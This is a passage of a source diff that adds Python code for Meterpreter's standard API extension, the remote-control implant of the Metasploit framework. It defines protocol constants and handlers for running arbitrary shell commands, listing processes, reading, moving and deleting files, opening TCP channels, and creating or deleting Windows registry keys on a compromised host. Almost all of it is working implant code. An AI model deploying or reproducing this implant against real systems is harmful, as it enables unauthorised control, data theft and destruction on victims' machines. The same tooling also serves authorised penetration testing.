+TLV_TYPE_NETWORK_INTERFACE =   TLV_META_TYPE_GROUP   | 1433
148
+
149
+TLV_TYPE_SUBNET_STRING =       TLV_META_TYPE_STRING  | 1440
150
+TLV_TYPE_NETMASK_STRING =      TLV_META_TYPE_STRING  | 1441
151
+TLV_TYPE_GATEWAY_STRING =      TLV_META_TYPE_STRING  | 1442
152
+
153
+# Socket
154
+TLV_TYPE_PEER_HOST =           TLV_META_TYPE_STRING  | 1500
155
+TLV_TYPE_PEER_PORT =           TLV_META_TYPE_UINT    | 1501
156
+TLV_TYPE_LOCAL_HOST =          TLV_META_TYPE_STRING  | 1502
157
+TLV_TYPE_LOCAL_PORT =          TLV_META_TYPE_UINT    | 1503
158
+TLV_TYPE_CONNECT_RETRIES =     TLV_META_TYPE_UINT    | 1504
159
+
160
+TLV_TYPE_SHUTDOWN_HOW =        TLV_META_TYPE_UINT    | 1530
161
+
162
+# Registry
163
+TLV_TYPE_HKEY               = TLV_META_TYPE_UINT    | 1000
164
+TLV_TYPE_ROOT_KEY           = TLV_TYPE_HKEY
165
+TLV_TYPE_BASE_KEY           = TLV_META_TYPE_STRING  | 1001
166
+TLV_TYPE_PERMISSION         = TLV_META_TYPE_UINT    | 1002
167
+TLV_TYPE_KEY_NAME           = TLV_META_TYPE_STRING  | 1003
168
+TLV_TYPE_VALUE_NAME         = TLV_META_TYPE_STRING  | 1010
169
+TLV_TYPE_VALUE_TYPE         = TLV_META_TYPE_UINT    | 1011
170
+TLV_TYPE_VALUE_DATA         = TLV_META_TYPE_RAW     | 1012
171
+TLV_TYPE_TARGET_HOST        = TLV_META_TYPE_STRING  | 1013
172
+
173
+# Config
174
+TLV_TYPE_COMPUTER_NAME =       TLV_META_TYPE_STRING  | 1040
175
+TLV_TYPE_OS_NAME =             TLV_META_TYPE_STRING  | 1041
176
+TLV_TYPE_USER_NAME =           TLV_META_TYPE_STRING  | 1042
177
+TLV_TYPE_ARCHITECTURE  =       TLV_META_TYPE_STRING  | 1043
178
+
179
+DELETE_KEY_FLAG_RECURSIVE = (1 << 0)
180
+
181
+# Process
182
+TLV_TYPE_BASE_ADDRESS =        TLV_META_TYPE_UINT    | 2000
183
+TLV_TYPE_ALLOCATION_TYPE =     TLV_META_TYPE_UINT    | 2001
184
+TLV_TYPE_PROTECTION =          TLV_META_TYPE_UINT    | 2002
185
+TLV_TYPE_PROCESS_PERMS =       TLV_META_TYPE_UINT    | 2003
186
+TLV_TYPE_PROCESS_MEMORY =      TLV_META_TYPE_RAW     | 2004
187
+TLV_TYPE_ALLOC_BASE_ADDRESS =  TLV_META_TYPE_UINT    | 2005
188
+TLV_TYPE_MEMORY_STATE =        TLV_META_TYPE_UINT    | 2006
189
+TLV_TYPE_MEMORY_TYPE =         TLV_META_TYPE_UINT    | 2007
190
+TLV_TYPE_ALLOC_PROTECTION =    TLV_META_TYPE_UINT    | 2008
191
+TLV_TYPE_PID =                 TLV_META_TYPE_UINT    | 2300
192
+TLV_TYPE_PROCESS_NAME =        TLV_META_TYPE_STRING  | 2301
193
+TLV_TYPE_PROCESS_PATH =        TLV_META_TYPE_STRING  | 2302
194
+TLV_TYPE_PROCESS_GROUP =       TLV_META_TYPE_GROUP   | 2303
195
+TLV_TYPE_PROCESS_FLAGS =       TLV_META_TYPE_UINT    | 2304
196
+TLV_TYPE_PROCESS_ARGUMENTS =   TLV_META_TYPE_STRING  | 2305
197
+TLV_TYPE_PROCESS_ARCH =        TLV_META_TYPE_UINT    | 2306
198
+TLV_TYPE_PARENT_PID =          TLV_META_TYPE_UINT    | 2307
199
+
200
+TLV_TYPE_IMAGE_FILE =          TLV_META_TYPE_STRING  | 2400
201
+TLV_TYPE_IMAGE_FILE_PATH =     TLV_META_TYPE_STRING  | 2401
202
+TLV_TYPE_PROCEDURE_NAME =      TLV_META_TYPE_STRING  | 2402
203
+TLV_TYPE_PROCEDURE_ADDRESS =   TLV_META_TYPE_UINT    | 2403
204
+TLV_TYPE_IMAGE_BASE =          TLV_META_TYPE_UINT    | 2404
205
+TLV_TYPE_IMAGE_GROUP =         TLV_META_TYPE_GROUP   | 2405
206
+TLV_TYPE_IMAGE_NAME =          TLV_META_TYPE_STRING  | 2406
207
+
208
+TLV_TYPE_THREAD_ID =           TLV_META_TYPE_UINT    | 2500
209
+TLV_TYPE_THREAD_PERMS =        TLV_META_TYPE_UINT    | 2502
210
+TLV_TYPE_EXIT_CODE =           TLV_META_TYPE_UINT    | 2510
211
+TLV_TYPE_ENTRY_POINT =         TLV_META_TYPE_UINT    | 2511
212
+TLV_TYPE_ENTRY_PARAMETER =     TLV_META_TYPE_UINT    | 2512
213
+TLV_TYPE_CREATION_FLAGS =      TLV_META_TYPE_UINT    | 2513
214
+
215
+TLV_TYPE_REGISTER_NAME =       TLV_META_TYPE_STRING  | 2540
216
+TLV_TYPE_REGISTER_SIZE =       TLV_META_TYPE_UINT    | 2541
217
+TLV_TYPE_REGISTER_VALUE_32 =   TLV_META_TYPE_UINT    | 2542
218
+TLV_TYPE_REGISTER =            TLV_META_TYPE_GROUP   | 2550
219
+
220
+##
221
+# Ui
222
+##
223
+TLV_TYPE_IDLE_TIME =           TLV_META_TYPE_UINT    | 3000
224
+TLV_TYPE_KEYS_DUMP =           TLV_META_TYPE_STRING  | 3001
225
+TLV_TYPE_DESKTOP =             TLV_META_TYPE_STRING  | 3002
226
+
227
+##
228
+# Event Log
229
+##
230
+TLV_TYPE_EVENT_SOURCENAME =    TLV_META_TYPE_STRING  | 4000
231
+TLV_TYPE_EVENT_HANDLE =        TLV_META_TYPE_UINT    | 4001
232
+TLV_TYPE_EVENT_NUMRECORDS =    TLV_META_TYPE_UINT    | 4002
233
+
234
+TLV_TYPE_EVENT_READFLAGS =     TLV_META_TYPE_UINT    | 4003
235
+TLV_TYPE_EVENT_RECORDOFFSET =  TLV_META_TYPE_UINT    | 4004
236
+
237
+TLV_TYPE_EVENT_RECORDNUMBER =  TLV_META_TYPE_UINT    | 4006
238
+TLV_TYPE_EVENT_TIMEGENERATED = TLV_META_TYPE_UINT    | 4007
239
+TLV_TYPE_EVENT_TIMEWRITTEN =   TLV_META_TYPE_UINT    | 4008
240
+TLV_TYPE_EVENT_ID =            TLV_META_TYPE_UINT    | 4009
241
+TLV_TYPE_EVENT_TYPE =          TLV_META_TYPE_UINT    | 4010
242
+TLV_TYPE_EVENT_CATEGORY =      TLV_META_TYPE_UINT    | 4011
243
+TLV_TYPE_EVENT_STRING =        TLV_META_TYPE_STRING  | 4012
244
+TLV_TYPE_EVENT_DATA =          TLV_META_TYPE_RAW     | 4013
245
+
246
+##
247
+# Power
248
+##
249
+TLV_TYPE_POWER_FLAGS =         TLV_META_TYPE_UINT    | 4100
250
+TLV_TYPE_POWER_REASON =        TLV_META_TYPE_UINT    | 4101
251
+
252
+##
253
+# Sys
254
+##
255
+PROCESS_EXECUTE_FLAG_HIDDEN = (1 << 0)
256
+PROCESS_EXECUTE_FLAG_CHANNELIZED = (1 << 1)
257
+PROCESS_EXECUTE_FLAG_SUSPENDED = (1 << 2)
258
+PROCESS_EXECUTE_FLAG_USE_THREAD_TOKEN = (1 << 3)
259
+
260
+PROCESS_ARCH_UNKNOWN = 0
261
+PROCESS_ARCH_X86 = 1
262
+PROCESS_ARCH_X64 = 2
263
+PROCESS_ARCH_IA64 = 3
264
+
265
+##
266
+# Errors
267
+##
268
+ERROR_SUCCESS = 0
269
+# not defined in original C implementation
270
+ERROR_FAILURE = 1
271
+
272
+# Special return value to match up with Windows error codes for network
273
+# errors.
274
+ERROR_CONNECTION_ERROR = 10000
275
+
276
+def get_stat_buffer(path):
277
+	si = os.stat(path)
278
+	rdev = 0
279
+	if hasattr(si, 'st_rdev'):
280
+		rdev = si.st_rdev
281
+	blksize = 0
282
+	if hasattr(si, 'st_blksize'):
283
+		blksize = si.st_blksize
284
+	blocks = 0
285
+	if hasattr(si, 'st_blocks'):
286
+		blocks = si.st_blocks
287
+	st_buf = struct.pack('<IHHH', si.st_dev, min(0xffff, si.st_ino), si.st_mode, si.st_nlink)
288
+	st_buf += struct.pack('<HHHI', si.st_uid, si.st_gid, 0, rdev)
289
+	st_buf += struct.pack('<IIII', si.st_size, si.st_atime, si.st_mtime, si.st_ctime)
290
+	st_buf += struct.pack('<II', blksize, blocks)
291
+	return st_buf
292
+
293
+def windll_GetNativeSystemInfo():
294
+	if not has_windll:
295
+		return None
296
+	sysinfo = SYSTEM_INFO()
297
+	ctypes.windll.kernel32.GetNativeSystemInfo(ctypes.byref(sysinfo))
298
+	return {0:PROCESS_ARCH_X86, 6:PROCESS_ARCH_IA64, 9:PROCESS_ARCH_X64}.get(sysinfo.wProcessorArchitecture, PROCESS_ARCH_UNKNOWN)
299
+
300
+@meterpreter.register_function
301
+def channel_create_stdapi_fs_file(request, response):
302
+	fpath = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
303
+	fmode = packet_get_tlv(request, TLV_TYPE_FILE_MODE)
304
+	if fmode:
305
+		fmode = fmode['value']
306
+		fmode = fmode.replace('bb', 'b')
307
+	else:
308
+		fmode = 'rb'
309
+	file_h = open(fpath, fmode)
310
+	channel_id = meterpreter.add_channel(file_h)
311
+	response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
312
+	return ERROR_SUCCESS, response
313
+
314
+@meterpreter.register_function
315
+def channel_create_stdapi_net_tcp_client(request, response):
316
+	host = packet_get_tlv(request, TLV_TYPE_PEER_HOST)['value']
317
+	port = packet_get_tlv(request, TLV_TYPE_PEER_PORT)['value']
318
+	local_host = packet_get_tlv(request, TLV_TYPE_LOCAL_HOST)
319
+	local_port = packet_get_tlv(request, TLV_TYPE_LOCAL_PORT)
320
+	retries = packet_get_tlv(request, TLV_TYPE_CONNECT_RETRIES).get('value', 1)
321
+	connected = False
322
+	for i in range(retries + 1):
323
+		sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
324
+		sock.settimeout(3.0)
325
+		if local_host.get('value') and local_port.get('value'):
326
+			sock.bind((local_host['value'], local_port['value']))
327
+		try:
328
+			sock.connect((host, port))
329
+			connected = True
330
+			break
331
+		except:
332
+			pass
333
+	if not connected:
334
+		return ERROR_CONNECTION_ERROR, response
335
+	channel_id = meterpreter.add_channel(sock)
336
+	response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
337
+	return ERROR_SUCCESS, response
338
+
339
+@meterpreter.register_function
340
+def stdapi_sys_config_getuid(request, response):
341
+	response += tlv_pack(TLV_TYPE_USER_NAME, getpass.getuser())
342
+	return ERROR_SUCCESS, response
343
+
344
+@meterpreter.register_function
345
+def stdapi_sys_config_sysinfo(request, response):
346
+	uname_info = platform.uname()
347
+	response += tlv_pack(TLV_TYPE_COMPUTER_NAME, uname_info[1])
348
+	response += tlv_pack(TLV_TYPE_OS_NAME, uname_info[0] + ' ' + uname_info[2] + ' ' + uname_info[3])
349
+	arch = uname_info[4]
350
+	if has_windll:
351
+		arch = windll_GetNativeSystemInfo()
352
+		if arch == PROCESS_ARCH_IA64:
353
+			arch = 'IA64'
354
+		elif arch == PROCESS_ARCH_X64:
355
+			arch = 'x86_64'
356
+		elif arch == PROCESS_ARCH_X86:
357
+			arch = 'x86'
358
+		else:
359
+			arch = uname_info[4]
360
+	response += tlv_pack(TLV_TYPE_ARCHITECTURE, arch)
361
+	return ERROR_SUCCESS, response
362
+
363
+@meterpreter.register_function
364
+def stdapi_sys_process_close(request, response):
365
+	proc_h_id = packet_get_tlv(request, TLV_TYPE_PROCESS_HANDLE)
366
+	if not proc_h_id:
367
+		return ERROR_SUCCESS, response
368
+	proc_h_id = proc_h_id['value']
369
+	proc_h = meterpreter.channels[proc_h_id]
370
+	proc_h.kill()
371
+	return ERROR_SUCCESS, response
372
+
373
+@meterpreter.register_function
374
+def stdapi_sys_process_execute(request, response):
375
+	cmd = packet_get_tlv(request, TLV_TYPE_PROCESS_PATH)['value']
376
+	raw_args = packet_get_tlv(request, TLV_TYPE_PROCESS_ARGUMENTS)
377
+	if raw_args:
378
+		raw_args = raw_args['value']
379
+	else:
380
+		raw_args = ""
381
+	flags = packet_get_tlv(request, TLV_TYPE_PROCESS_FLAGS)['value']
382
+	if len(cmd) == 0:
383
+		return ERROR_FAILURE, response
384
+	if os.path.isfile('/bin/sh'):
385
+		args = ['/bin/sh', '-c', cmd + ' ' + raw_args]
386
+	else:
387
+		args = [cmd]
388
+		args.extend(shlex.split(raw_args))
389
+	if (flags & PROCESS_EXECUTE_FLAG_CHANNELIZED):
390
+		if has_pty:
391
+			master, slave = pty.openpty()
392
+			if has_termios:
393
+				settings = termios.tcgetattr(master)
394
+				settings[3] = settings[3] & ~termios.ECHO
395
+				termios.tcsetattr(master, termios.TCSADRAIN, settings)
396
+			proc_h = STDProcess(args, stdin=slave, stdout=slave, stderr=slave, bufsize=0)
397
+			proc_h.stdin = os.fdopen(master, 'wb')
398
+			proc_h.stdout = os.fdopen(master, 'rb')
399
+			proc_h.stderr = open(os.devnull, 'rb')
400
+		else:
401
+			proc_h = STDProcess(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
402
+		proc_h.start()
403
+	else:
404
+		proc_h = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
405
+	proc_h_id = meterpreter.add_process(proc_h)
406
+	response += tlv_pack(TLV_TYPE_PID, proc_h.pid)
407
+	response += tlv_pack(TLV_TYPE_PROCESS_HANDLE, proc_h_id)
408
+	if (flags & PROCESS_EXECUTE_FLAG_CHANNELIZED):
409
+		channel_id = meterpreter.add_channel(proc_h)
410
+		response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
411
+	return ERROR_SUCCESS, response
412
+
413
+@meterpreter.register_function
414
+def stdapi_sys_process_getpid(request, response):
415
+	response += tlv_pack(TLV_TYPE_PID, os.getpid())
416
+	return ERROR_SUCCESS, response
417
+
418
+def stdapi_sys_process_get_processes_via_proc(request, response):
419
+	for pid in os.listdir('/proc'):
420
+		pgroup = ''
421
+		if not os.path.isdir(os.path.join('/proc', pid)) or not pid.isdigit():
422
+			continue
423
+		cmd = open(os.path.join('/proc', pid, 'cmdline'), 'rb').read(512).replace('\x00', ' ')
424
+		status_data = open(os.path.join('/proc', pid, 'status'), 'rb').read()
425
+		status_data = map(lambda x: x.split('\t',1), status_data.split('\n'))
426
+		status_data = filter(lambda x: len(x) == 2, status_data)
427
+		status = {}
428
+		for k, v in status_data:
429
+			status[k[:-1]] = v.strip()
430
+		ppid = status.get('PPid')
431
+		uid = status.get('Uid').split('\t', 1)[0]
432
+		if has_pwd:
433
+			uid = pwd.getpwuid(int(uid)).pw_name
434
+		if cmd:
435
+			pname = os.path.basename(cmd.split(' ', 1)[0])
436
+			ppath = cmd
437
+		else:
438
+			pname = '[' + status['Name'] + ']'
439
+			ppath = ''
440
+		pgroup += tlv_pack(TLV_TYPE_PID, int(pid))
441
+		if ppid:
442
+			pgroup += tlv_pack(TLV_TYPE_PARENT_PID, int(ppid))
443
+		pgroup += tlv_pack(TLV_TYPE_USER_NAME, uid)
444
+		pgroup += tlv_pack(TLV_TYPE_PROCESS_NAME, pname)
445
+		pgroup += tlv_pack(TLV_TYPE_PROCESS_PATH, ppath)
446
+		response += tlv_pack(TLV_TYPE_PROCESS_GROUP, pgroup)
447
+	return ERROR_SUCCESS, response
448
+
449
+def stdapi_sys_process_get_processes_via_ps(request, response):
450
+	ps_args = ['ps', 'ax', '-w', '-o', 'pid,ppid,user,command']
451
+	proc_h = subprocess.Popen(ps_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
452
+	ps_output = proc_h.stdout.read()
453
+	ps_output = ps_output.split('\n')
454
+	ps_output.pop(0)
455
+	for process in ps_output:
456
+		process = process.split()
457
+		if len(process) < 4:
458
+			break
459
+		pgroup = ''
460
+		pgroup += tlv_pack(TLV_TYPE_PID, int(process[0]))
461
+		pgroup += tlv_pack(TLV_TYPE_PARENT_PID, int(process[1]))
462
+		pgroup += tlv_pack(TLV_TYPE_USER_NAME, process[2])
463
+		pgroup += tlv_pack(TLV_TYPE_PROCESS_NAME, os.path.basename(process[3]))
464
+		pgroup += tlv_pack(TLV_TYPE_PROCESS_PATH, ' '.join(process[3:]))
465
+		response += tlv_pack(TLV_TYPE_PROCESS_GROUP, pgroup)
466
+	return ERROR_SUCCESS, response
467
+
468
+def stdapi_sys_process_get_processes_via_windll(request, response):
469
+	TH32CS_SNAPPROCESS = 2
470
+	PROCESS_QUERY_INFORMATION = 0x0400
471
+	PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
472
+	PROCESS_VM_READ = 0x10
473
+	TOKEN_QUERY = 0x0008
474
+	TokenUser = 1
475
+	k32 = ctypes.windll.kernel32
476
+	pe32 = PROCESSENTRY32()
477
+	pe32.dwSize = ctypes.sizeof(PROCESSENTRY32)
478
+	proc_snap = k32.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
479
+	result = k32.Process32First(proc_snap, ctypes.byref(pe32))
480
+	if not result:
481
+		return ERROR_FAILURE, response
482
+	while result:
483
+		proc_h = k32.OpenProcess((PROCESS_QUERY_INFORMATION | PROCESS_VM_READ), False, pe32.th32ProcessID)
484
+		if not proc_h:
485
+			proc_h = k32.OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, False, pe32.th32ProcessID)
486
+		exe_path = (ctypes.c_char * 1024)()
487
+		success = False
488
+		if hasattr(ctypes.windll.psapi, 'GetModuleFileNameExA'):
489
+			success = ctypes.windll.psapi.GetModuleFileNameExA(proc_h, 0, exe_path, ctypes.sizeof(exe_path))
490
+		elif hasattr(k32, 'GetModuleFileNameExA'):
491
+			success = k32.GetModuleFileNameExA(proc_h, 0, exe_path, ctypes.sizeof(exe_path))
492
+		if not success and hasattr(k32, 'QueryFullProcessImageNameA'):
493
+			dw_sz = ctypes.c_uint32()
494
+			dw_sz.value = ctypes.sizeof(exe_path)
495
+			success = k32.QueryFullProcessImageNameA(proc_h, 0, exe_path, ctypes.byref(dw_sz))
496
+		if not success and hasattr(ctypes.windll.psapi, 'GetProcessImageFileNameA'):
497
+			success = ctypes.windll.psapi.GetProcessImageFileNameA(proc_h, exe_path, ctypes.sizeof(exe_path))
498
+		if success:
499
+			exe_path = ctypes.string_at(exe_path)
500
+		else:
501
+			exe_path = ''
502
+		complete_username = ''
503
+		tkn_h = ctypes.c_long()
504
+		tkn_len = ctypes.c_uint32()
505
+		if ctypes.windll.advapi32.OpenProcessToken(proc_h, TOKEN_QUERY, ctypes.byref(tkn_h)):
506
+			ctypes.windll.advapi32.GetTokenInformation(tkn_h, TokenUser, None, 0, ctypes.byref(tkn_len))
507
+			buf = (ctypes.c_ubyte * tkn_len.value)()
508
+			if ctypes.windll.advapi32.GetTokenInformation(tkn_h, TokenUser, ctypes.byref(buf), ctypes.sizeof(buf), ctypes.byref(tkn_len)):
509
+				user_tkn = SID_AND_ATTRIBUTES()
510
+				ctypes.memmove(ctypes.byref(user_tkn), buf, ctypes.sizeof(user_tkn))
511
+				username = (ctypes.c_char * 512)()
512
+				domain = (ctypes.c_char * 512)()
513
+				u_len = ctypes.c_uint32()
514
+				u_len.value = ctypes.sizeof(username)
515
+				d_len = ctypes.c_uint32()
516
+				d_len.value = ctypes.sizeof(domain)
517
+				use = ctypes.c_ulong()
518
+				use.value = 0
519
+				ctypes.windll.advapi32.LookupAccountSidA(None, user_tkn.Sid, username, ctypes.byref(u_len), domain, ctypes.byref(d_len), ctypes.byref(use))
520
+				complete_username = ctypes.string_at(domain) + '\\' + ctypes.string_at(username)
521
+			k32.CloseHandle(tkn_h)
522
+		parch = windll_GetNativeSystemInfo()
523
+		is_wow64 = ctypes.c_ubyte()
524
+		is_wow64.value = 0
525
+		if hasattr(k32, 'IsWow64Process'):
526
+			if k32.IsWow64Process(proc_h, ctypes.byref(is_wow64)):
527
+				if is_wow64.value:
528
+					parch = PROCESS_ARCH_X86
529
+		pgroup = ''
530
+		pgroup += tlv_pack(TLV_TYPE_PID, pe32.th32ProcessID)
531
+		pgroup += tlv_pack(TLV_TYPE_PARENT_PID, pe32.th32ParentProcessID)
532
+		pgroup += tlv_pack(TLV_TYPE_USER_NAME, complete_username)
533
+		pgroup += tlv_pack(TLV_TYPE_PROCESS_NAME, pe32.szExeFile)
534
+		pgroup += tlv_pack(TLV_TYPE_PROCESS_PATH, exe_path)
535
+		pgroup += tlv_pack(TLV_TYPE_PROCESS_ARCH, parch)
536
+		response += tlv_pack(TLV_TYPE_PROCESS_GROUP, pgroup)
537
+		result = k32.Process32Next(proc_snap, ctypes.byref(pe32))
538
+		k32.CloseHandle(proc_h)
539
+	k32.CloseHandle(proc_snap)
540
+	return ERROR_SUCCESS, response
541
+
542
+@meterpreter.register_function
543
+def stdapi_sys_process_get_processes(request, response):
544
+	if os.path.isdir('/proc'):
545
+		return stdapi_sys_process_get_processes_via_proc(request, response)
546
+	elif has_windll:
547
+		return stdapi_sys_process_get_processes_via_windll(request, response)
548
+	else:
549
+		return stdapi_sys_process_get_processes_via_ps(request, response)
550
+	return ERROR_FAILURE, response
551
+
552
+@meterpreter.register_function
553
+def stdapi_fs_chdir(request, response):
554
+	wd = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value']
555
+	os.chdir(wd)
556
+	return ERROR_SUCCESS, response
557
+
558
+@meterpreter.register_function
559
+def stdapi_fs_delete(request, response):
560
+	file_path = packet_get_tlv(request, TLV_TYPE_FILE_NAME)['value']
561
+	os.unlink(file_path)
562
+	return ERROR_SUCCESS, response
563
+
564
+@meterpreter.register_function
565
+def stdapi_fs_delete_dir(request, response):
566
+	dir_path = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value']
567
+	if os.path.islink(dir_path):
568
+		del_func = os.unlink
569
+	else:
570
+		del_func = shutil.rmtree
571
+	del_func(dir_path)
572
+	return ERROR_SUCCESS, response
573
+
574
+@meterpreter.register_function
575
+def stdapi_fs_delete_file(request, response):
576
+	file_path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
577
+	os.unlink(file_path)
578
+	return ERROR_SUCCESS, response
579
+
580
+@meterpreter.register_function
581
+def stdapi_fs_file_expand_path(request, response):
582
+	path_tlv = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
583
+	if has_windll:
584
+		path_out = (ctypes.c_char * 4096)()
585
+		path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(path_tlv, ctypes.byref(path_out), ctypes.sizeof(path_out))
586
+		result = ''.join(path_out)[:path_out_len]
587
+	elif path_tlv == '%COMSPEC%':
588
+		result = '/bin/sh'
589
+	elif path_tlv in ['%TEMP%', '%TMP%']:
590
+		result = '/tmp'
591
+	else:
592
+		result = os.getenv(path_tlv, path_tlv)
593
+	if not result:
594
+		return ERROR_FAILURE, response
595
+	response += tlv_pack(TLV_TYPE_FILE_PATH, result)
596
+	return ERROR_SUCCESS, response
597
+
598
+@meterpreter.register_function
599
+def stdapi_fs_file_move(request, response):
600
+	oldname = packet_get_tlv(request, TLV_TYPE_FILE_NAME)['value']
601
+	newname = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
602
+	os.rename(oldname, newname)
603
+	return ERROR_SUCCESS, response
604
+
605
+@meterpreter.register_function
606
+def stdapi_fs_getwd(request, response):
607
+	response += tlv_pack(TLV_TYPE_DIRECTORY_PATH, os.getcwd())
608
+	return ERROR_SUCCESS, response
609
+
610
+@meterpreter.register_function
611
+def stdapi_fs_ls(request, response):
612
+	path = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value']
613
+	path = os.path.abspath(path)
614
+	contents = os.listdir(path)
615
+	contents.sort()
616
+	for x in contents:
617
+		y = os.path.join(path, x)
618
+		response += tlv_pack(TLV_TYPE_FILE_NAME, x)
619
+		response += tlv_pack(TLV_TYPE_FILE_PATH, y)
620
+		response += tlv_pack(TLV_TYPE_STAT_BUF, get_stat_buffer(y))
621
+	return ERROR_SUCCESS, response
622
+
623
+@meterpreter.register_function
624
+def stdapi_fs_md5(request, response):
625
+	if sys.version_info[0] == 2 and sys.version_info[1] < 5:
626
+		import md5
627
+		m = md5.new()
628
+	else:
629
+		import hashlib
630
+		m = hashlib.md5()
631
+	path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
632
+	m.update(open(path, 'rb').read())
633
+	response += tlv_pack(TLV_TYPE_FILE_NAME, m.digest())
634
+	return ERROR_SUCCESS, response
635
+
636
+@meterpreter.register_function
637
+def stdapi_fs_mkdir(request, response):
638
+	dir_path = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value']
639
+	os.mkdir(dir_path)
640
+	return ERROR_SUCCESS, response
641
+
642
+@meterpreter.register_function
643
+def stdapi_fs_search(request, response):
644
+	search_root = packet_get_tlv(request, TLV_TYPE_SEARCH_ROOT).get('value', '.')
645
+	search_root = ('' or '.') # sometimes it's an empty string
646
+	glob = packet_get_tlv(request, TLV_TYPE_SEARCH_GLOB)['value']
647
+	recurse = packet_get_tlv(request, TLV_TYPE_SEARCH_RECURSE)['value']
648
+	if recurse:
649
+		for root, dirs, files in os.walk(search_root):
650
+			for f in filter(lambda f: fnmatch.fnmatch(f, glob), files):
651
+				file_tlv  = ''
652
+				file_tlv += tlv_pack(TLV_TYPE_FILE_PATH, root)
653
+				file_tlv += tlv_pack(TLV_TYPE_FILE_NAME, f)
654
+				file_tlv += tlv_pack(TLV_TYPE_FILE_SIZE, os.stat(os.path.join(root, f)).st_size)
655
+				response += tlv_pack(TLV_TYPE_SEARCH_RESULTS, file_tlv)
656
+	else:
657
+		for f in filter(lambda f: fnmatch.fnmatch(f, glob), os.listdir(search_root)):
658
+			file_tlv  = ''
659
+			file_tlv += tlv_pack(TLV_TYPE_FILE_PATH, search_root)
660
+			file_tlv += tlv_pack(TLV_TYPE_FILE_NAME, f)
661
+			file_tlv += tlv_pack(TLV_TYPE_FILE_SIZE, os.stat(os.path.join(search_root, f)).st_size)
662
+			response += tlv_pack(TLV_TYPE_SEARCH_RESULTS, file_tlv)
663
+	return ERROR_SUCCESS, response
664
+
665
+@meterpreter.register_function
666
+def stdapi_fs_separator(request, response):
667
+	response += tlv_pack(TLV_TYPE_STRING, os.sep)
668
+	return ERROR_SUCCESS, response
669
+
670
+@meterpreter.register_function
671
+def stdapi_fs_sha1(request, response):
672
+	if sys.version_info[0] == 2 and sys.version_info[1] < 5:
673
+		import sha1
674
+		m = sha1.new()
675
+	else:
676
+		import hashlib
677
+		m = hashlib.sha1()
678
+	path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
679
+	m.update(open(path, 'rb').read())
680
+	response += tlv_pack(TLV_TYPE_FILE_NAME, m.digest())
681
+	return ERROR_SUCCESS, response
682
+
683
+@meterpreter.register_function
684
+def stdapi_fs_stat(request, response):
685
+	path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
686
+	st_buf = get_stat_buffer(path)
687
+	response += tlv_pack(TLV_TYPE_STAT_BUF, st_buf)
688
+	return ERROR_SUCCESS, response
689
+
690
+@meterpreter.register_function
691
+def stdapi_net_socket_tcp_shutdown(request, response):
692
+	channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)
693
+	channel = meterpreter.channels[channel_id]
694
+	channel.close()
695
+	return ERROR_SUCCESS, response
696
+
697
+@meterpreter.register_function_windll
698
+def stdapi_registry_close_key(request, response):
699
+	hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
700
+	result = ctypes.windll.advapi32.RegCloseKey(hkey)
701
+	return ERROR_SUCCESS, response
702
+
703
+@meterpreter.register_function_windll
704
+def stdapi_registry_create_key(request, response):
705
+	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
706
+	base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
707
+	permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS)
708
+	res_key = ctypes.c_void_p()
709
+	if ctypes.windll.advapi32.RegCreateKeyExA(root_key, base_key, 0, None, 0, permission, None, ctypes.byref(res_key), None) == ERROR_SUCCESS:
710
+		response += tlv_pack(TLV_TYPE_HKEY, res_key.value)
711
+		return ERROR_SUCCESS, response
712
+	return ERROR_FAILURE, response
713
+
714
+@meterpreter.register_function_windll
715
+def stdapi_registry_delete_key(request, response):
716
+	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
717
+	base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
718
+	flags = packet_get_tlv(request, TLV_TYPE_FLAGS)['value']
719
+	if (flags & DELETE_KEY_FLAG_RECURSIVE):
720
+		result = ctypes.windll.shlwapi.SHDeleteKeyA(root_key, base_key)
721
+	else:
722
+		result = ctypes.windll.advapi32.RegDeleteKeyA(root_key, base_key)
723
+	return result, response
724
+
725
+@meterpreter.register_function_windll
726
+def stdapi_registry_delete_value(request, response):
727
+	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
728
+	value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
729
+	result = ctypes.windll.advapi32.RegDeleteValueA(root_key, value_name)
730
+	return result, response
731
+
732
+@meterpreter.register_function_windll
733
+def stdapi_registry_enum_key(request, response):
734
+	ERROR_MORE_DATA = 0xea
735
+	ERROR_NO_MORE_ITEMS = 0x0103
736
+	hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
737
+	name = (ctypes.c_char * 4096)()
738
+	index = 0
739
+	tries = 0
740
+	while True:
741
+		result = ctypes.windll.advapi32.RegEnumKeyA(hkey, index, name, ctypes.sizeof(name))
742
